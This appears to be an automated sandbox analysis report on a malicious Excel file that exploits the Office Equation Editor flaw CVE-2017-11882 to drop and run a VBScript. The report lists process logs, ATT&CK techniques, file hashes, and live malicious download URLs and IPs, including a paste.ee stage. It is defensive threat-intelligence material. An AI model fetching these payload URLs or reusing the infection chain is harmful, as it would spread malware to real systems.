Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: Product list 0980DF098A7.xls	Stream path 'MBD00014726/CONTENTS' entropy: 7.9671168067 (max. 8.0)
Source: Product list 0980DF098A7.xls	Stream path 'MBD00014727/CONTENTS' entropy: 7.91669502048 (max. 8.0)
Source: Product list 0980DF098A7.xls	Stream path 'Workbook' entropy: 7.99804467882 (max. 8.0)
Source: E6630000.0.dr	Stream path 'MBD00014726/CONTENTS' entropy: 7.9671168067 (max. 8.0)
Source: E6630000.0.dr	Stream path 'MBD00014727/CONTENTS' entropy: 7.91669502048 (max. 8.0)
Source: E6630000.0.dr	Stream path 'Workbook' entropy: 7.99872891303 (max. 8.0)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3392

Thread sleep time: -300000s >= -30000s

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

API call chain: ExitProcess graph end node

graph_10-1404

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 10_2_03420646 mov edx, dword ptr fs:[00000030h]

10_2_03420646

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe	Network Connect: 104.21.84.67 80			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Domain query: paste.ee

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\loveforsave.vbs"

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	121 Scripting	Valid Accounts	33 Exploitation for Client Execution	121 Scripting	111 Process Injection	1 Masquerading	OS Credential Dumping	1 Virtualization/Sandbox Evasion	Remote Services	Data from Local System	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Remote System Discovery	Remote Desktop Protocol	Data from Removable Media	23 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Virtualization/Sandbox Evasion	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	3 System Information Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Product list 0980DF098A7.xls	11%	ReversingLabs
Product list 0980DF098A7.xls	18%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\beautifulpeoplesaroundtheworldtodevelopnewthingswiththeworldwidetechnologyformicrosoftballonsystemdevelopementpcpcto[1].doc	100%	Avira	HEUR/Rtf.Malformed
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{9884DA1E-FD29-4340-AB77-A6BEF9386CEC}.tmp	100%	Avira	EXP/CVE-2017-11882.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C5290082.doc	100%	Avira	HEUR/Rtf.Malformed

Source	Detection	Scanner	Label	Link
http://107.175.202.154/rmc/beautifulpeop	100%	Avira URL Cloud	malware
http://107.175.202.154/rmc/beautifulpeoplesaroundtheworldtodevelopnewthingswiththeworldwidetechnolog	100%	Avira URL Cloud	malware
http://107.175.202.154/46900/loveforsave.vbsppC:	100%	Avira URL Cloud	malware
http://107.175.202.154/46900/loveforsave.vbsalt	100%	Avira URL Cloud	malware
http://107.175.202.154/46900/loveforsave.vbs$	100%	Avira URL Cloud	malware
http://107.175.202.154/rmc/beautifulpeop	13%	Virustotal		Browse
http://107.175.202.154/46900/loveforsave.vbs	100%	Avira URL Cloud	malware
http://107.175.202.154/rmc/beautifulpeoplesaroundtheworldtodevelopnewthingswiththeworldwidetechnologyformicrosoftballonsystemdevelopementpcpcto.doC	100%	Avira URL Cloud	malware
http://107.175.202.154/rmc/	100%	Avira URL Cloud	malware
http://107.175.202.154/46900/loveforsave.vbsj	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
paste.ee	104.21.84.67	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://paste.ee/d/enGXm	false		high
http://107.175.202.154/46900/loveforsave.vbs	true	Avira URL Cloud: malware	unknown
http://107.175.202.154/rmc/beautifulpeoplesaroundtheworldtodevelopnewthingswiththeworldwidetechnologyformicrosoftballonsystemdevelopementpcpcto.doC	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://107.175.202.154/rmc/beautifulpeop	Product list 0980DF098A7.xls	false	13%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://107.175.202.154/rmc/beautifulpeoplesaroundtheworldtodevelopnewthingswiththeworldwidetechnolog	E6630000.0.dr, beautifulpeoplesaroundtheworldtodevelopnewthingswiththeworldwidetechnologyformicrosoftballonsystemdevelopementpcpcto.doC.url.4.dr, ~DFF965D8A88A314F5E.TMP.0.dr	false	Avira URL Cloud: malware	unknown
http://107.175.202.154/46900/loveforsave.vbsalt	EQNEDT32.EXE, 0000000A.00000002.430879838.000000000054F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://paste.ee/d/enGXmnged	wscript.exe, 0000000B.00000003.499402058.000000000080D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://107.175.202.154/46900/loveforsave.vbs$	EQNEDT32.EXE, 0000000A.00000002.430879838.000000000054F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://107.175.202.154/46900/loveforsave.vbsppC:	EQNEDT32.EXE, 0000000A.00000002.430879838.000000000054F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://107.175.202.154/rmc/	rmc on 107.175.202.154.url.4.dr	false	Avira URL Cloud: malware	unknown
http://107.175.202.154/46900/loveforsave.vbsj	EQNEDT32.EXE, 0000000A.00000002.431072220.0000000003420000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.84.67	paste.ee	United States		13335	CLOUDFLARENETUS	false
107.175.202.154	unknown	United States		36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1392858
Start date and time:	2024-02-15 14:17:35 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Product list 0980DF098A7.xls
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLS@14/45@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 6 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Active ActiveX Object Active ActiveX Object Active ActiveX Object Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, svchost.exe
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:19:04	API Interceptor	31x Sleep call for process: EQNEDT32.EXE modified
14:19:05	API Interceptor	491x Sleep call for process: wscript.exe modified
14:19:14	API Interceptor	184x Sleep call for process: AcroRd32.exe modified
14:19:32	API Interceptor	40x Sleep call for process: RdrCEF.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.84.67	Payment_advice.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/wXm0Y
	SHREE GANESH BOOK SERVICES-347274.xls	Get hash	malicious	Unknown	Browse	paste.ee/d/eA3FM
	dereac.vbe	Get hash	malicious	Unknown	Browse	paste.ee/d/JZHbW
	P018400.xla.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/kmRFs
	comprobante0089.xla.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/cJo7v
	RFQ l MR24000112.xla.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/EgkAG
	87645345.vbs	Get hash	malicious	XWorm	Browse	paste.ee/d/IJGyf
	182763543.vbs	Get hash	malicious	XWorm	Browse	paste.ee/d/0kkOm
	PaymentEUR41000.xls	Get hash	malicious	Remcos	Browse	paste.ee/d/oVqcS
	RFQ-#Uacac#Uc801#Uc758#Ub8b0#Uc11c-#Uacac#Uc801#Uc758#Ub8b0#Uc11c.vbs	Get hash	malicious	Remcos	Browse	paste.ee/d/6VwxD
107.175.202.154	oerder specifications.xls	Get hash	malicious	Remcos	Browse	107.175.202.154/6666/LLCR.txt

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
paste.ee	ODC#PO 4500628950098574654323567875765674433##633.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.187.200
	Purchase Order PO0193832.vbs	Get hash	malicious	Unknown	Browse	172.67.187.200
	Payment_advice.vbs	Get hash	malicious	Unknown	Browse	104.21.84.67
	SHREE GANESH BOOK SERVICES-347274.xls	Get hash	malicious	Unknown	Browse	104.21.84.67
	dereac.vbe	Get hash	malicious	Unknown	Browse	104.21.84.67
	Name.vbs	Get hash	malicious	Unknown	Browse	172.67.187.200
	P018400.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.84.67
	517209487.vbs	Get hash	malicious	XWorm	Browse	172.67.187.200
	comprobante0089.xla.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.84.67
	RFQ l MR24000112.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.84.67

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-COLOCROSSINGUS	https://emails.insurancebusinessmag.com/e3t/Ctc/I8+113/d2zjxh04/VW6MJZ3VsG_FW59y6sK5CSs0DW7vv0b_59w_LDN3DlwGW3qgyTW95jsWP6lZ3pnW1Lk0VP2nvPGGW2Xk_qt38sGysN7zvKMv51TnpVNLfGL2Y4y5nW4xZ_495G_MNBW7Md-kN48pBLzVP_Sbm8YLGhvW2_Dt7-8Y-2d6W8PvxMX1pNkspW5HB4ZZ8lTxJ4W6sdDSx73qKmwW9f_1248yq_JdW8lT3vj8VM8BhW88FCLX6pL2dQW31lbRb1fJD8SW6SlWz17cY4WWW9kR85K1HNMvHVc6nkv1BLpKSW4lcsvZ5xxct8W993L8-1_l2F-W8lKlnP5BX528W2KR4NP9jytmLW14HJbz10WLxkW1fss5C6bTz4VW6c0tM070QDhpW5V8-zV3N2bxjW4w8sgH1zQ1pgW8TrVXK6HsHJ8Vv255V4KlhgsW3NdB0Z7FClb_f40hfm204	Get hash	malicious	Unknown	Browse	23.95.182.9
	DTR00000009000.cmd.exe	Get hash	malicious	Remcos	Browse	107.175.229.139
	FA98655890008000.bat.exe	Get hash	malicious	PureLog Stealer, Remcos	Browse	107.175.229.139
	ODC#PO 4500628950098574654323567875765674433##633.xla.xlsx	Get hash	malicious	Unknown	Browse	172.245.214.91
	https://www.youdaizc.cn/	Get hash	malicious	Unknown	Browse	198.23.229.208
	https://www.vktndvw.cn/	Get hash	malicious	Unknown	Browse	198.23.229.208
	z15TFDG098700080000800.BAT.exe	Get hash	malicious	Remcos	Browse	107.175.229.139
	3PDFfdp.exe	Get hash	malicious	DarkTortilla, Remcos	Browse	107.175.229.139
	6fdp.exe	Get hash	malicious	DarkTortilla, Remcos	Browse	107.175.229.139
	http://www.resisystems.co.uk/	Get hash	malicious	Unknown	Browse	23.95.182.9
CLOUDFLARENETUS	lods.cmd	Get hash	malicious	Remcos	Browse	104.26.12.205
	#U0417#U0430#U043f#U0438#U0442.docx.exe	Get hash	malicious	LummaC	Browse	104.21.4.139
	VESSEL PARTICULARS & INSTRUCTIONS_docx.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.21.26.210
	BUNQ00009082342624.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	RFQ__AYLLA CAFE (FEB-2024)_pdf.gz.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	ZHANHIpb428A2Aa.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	file.exe	Get hash	malicious	LummaC	Browse	104.21.59.108
	wl3mdANz5E.exe	Get hash	malicious	RedLine	Browse	104.20.67.143
	INV2024020090.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	Frapendiente-2024.exe	Get hash	malicious	LummaC, MicroClip	Browse	172.67.154.29

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	modified
Size (bytes):	270336
Entropy (8bit):	0.0018741110582386662
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE+/Fl:/M/xT02z
MD5:	5BAE925BE711A4FE6D911729A89C178C
SHA1:	ECBA616BD247309B85BB03D1537F48401EB1077A
SHA-256:	5C0912E862980B1C2B8A909A1BAB6BFE2F4CB8E70BC0759181851AFF95BAE867
SHA-512:	0A095E5E69C9BD3071EE49EC8EE05AED1A6640E017ED5562DF86E5CDE239953B67E0BF47090CDF038991E954F6439A8CDC9D0BCA03A188FD510EE4A9C8A18318
Malicious:	false
Reputation:	low
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.025591245842101852
Encrypted:	false
SSDEEP:	6:I3DPcpmwvvxggLRTi+vfbOozD6tRXv//4tfnRujlw//+GtluJ/eRuj:I3DP4B/ViozGTvYg3J/
MD5:	EBC64D1B601977EE260FD196317B5271
SHA1:	81E6E797F94BD994BC98BA019996E4D97CE32156
SHA-256:	21F0080C2BB13429B374C06AC8AE65EC786E1984E3E943CBD56FEA645C348AB6
SHA-512:	494E3D5827DF6F65437D060303C02BD09C9A2A3D357346842680C77CF22F4F6CE361817B1B455FCDE3DC2BA7F5EC88227E397E51EBF4837679ACCD2546277DCE
Malicious:	false
Preview:	......M.eFy...z..p.`}8J......F=S,...X.F...Fa.q................................2..I..iY..1..........?9.A.J..qD...).....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	604
Entropy (8bit):	3.444961980660846
Encrypted:	false
SSDEEP:	12:Q2x+xfkEdHALClUlgTbllPAB9Sl7/2U/SVsFf8fElI5VX:Q2x88ENAv6TDUgRT/SVsFf8fnVX
MD5:	CD8AC425DD5496C10D4D123D3708290B
SHA1:	D3F97E4CB0C36BFF404A9BCF65C5A5930A7D50CD
SHA-256:	A7EC40E4A96116518D8A00208714884BBCD1C0D4751CB645D9D73F2505B09740
SHA-512:	36BF7ABD4555683E192B697EA5D5FC3ACAE6BD48FCB27CF18053C94E58F043141AD5878D037331CAAA628C2602075F4E56BD987174D352D17CE13AB81B1E0F79
Malicious:	true
